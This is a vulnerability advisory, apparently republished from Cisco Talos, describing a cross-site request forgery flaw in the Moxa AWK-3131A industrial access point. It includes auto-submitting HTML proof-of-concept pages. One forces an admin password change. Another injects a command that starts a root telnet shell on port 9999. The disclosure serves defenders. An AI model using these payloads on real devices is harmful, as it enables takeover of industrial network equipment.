Moxa AWK-3131A Web Application Cross-Site Request Forgery Vulnerability(CVE-2016-8718)

2017-09-20T00:00:00
ID SSV:96541
Type seebug
Reporter Root
Modified 2017-09-20T00:00:00

Description

Summary

An exploitable Cross-Site Request Forgery vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

http://www.moxa.com/product/AWK-3131A.htm

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Details

An exploitable Cross-Site Request Forgery (CSRF) vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request. Successful exploitation of this vulnerability can enable an attacker to trick a legitimate user in to performing any action permitted by the device, including exploitation of unrelated vulnerabilities. For example, an attacker may use a CSRF attack to modify device settings or even take advantage of OS Command Injection vulnerabilities to execute operating system commands with root privileges.

Exploit Proof-of-Concept

The below will change the user's password to a value determined by the attacker <html> <body> <form action="http://<device IP>/forms/webSetUserChgPwd" method="POST"> <input type="hidden" name="NowPasswd" value="root" /> <input type="hidden" name="Passwd" value="hacked" /> <input type="hidden" name="ConfPasswd" value="hacked" /> <input type="hidden" name="Submit" value="Submit" /> <input type="hidden" name="UserName" value="admin" /> <input type="hidden" name="bkpath" value="/Password.asp" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

Alternatively, leveraging an OS Command Injection vulnerability in conjunction with CSRF, a client which attempts to render the below page will cause a root-level shell to be opened on the vulnerable device: ``` <html>
<body> <form action="http://<device IP>/forms/webSetPingTrace" method="POST"> <input type="hidden" name="srvName" value="; /bin/busybox telnetd -l/bin/sh -p9999" /> <input type="hidden" name="option" value="0" /> <input type="hidden" name="bkpath" value="/ping_trace.asp" /> <input type="submit" value="Submit request" /> </form>

<script> document.forms[0].submit(); </script> </body> </html> ```

Mitigation

To significantly mitigate risk of exploitation, disable the web application before the device is deployed.

Timeline

  • 2016-11-14 - Vendor Disclosure
  • 2017-04-10 - Public Release

CREDIT

  • Discovered by Patrick DeSantis of Cisco Talos.
                                        
                                            
                                                &lt;html&gt;
    &lt;body&gt;
    &lt;form action="http://&lt;device IP&gt;/forms/webSetUserChgPwd" method="POST"&gt;
      &lt;input type="hidden" name="NowPasswd" value="root" /&gt;
      &lt;input type="hidden" name="Passwd" value="hacked" /&gt;
      &lt;input type="hidden" name="ConfPasswd" value="hacked" /&gt;
      &lt;input type="hidden" name="Submit" value="Submit" /&gt;
      &lt;input type="hidden" name="UserName" value="admin" /&gt;
      &lt;input type="hidden" name="bkpath" value="&#47;Password&#46;asp" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
    &lt;script&gt;
      document.forms[0].submit();
    &lt;/script&gt;
    &lt;/body&gt;
&lt;/html&gt;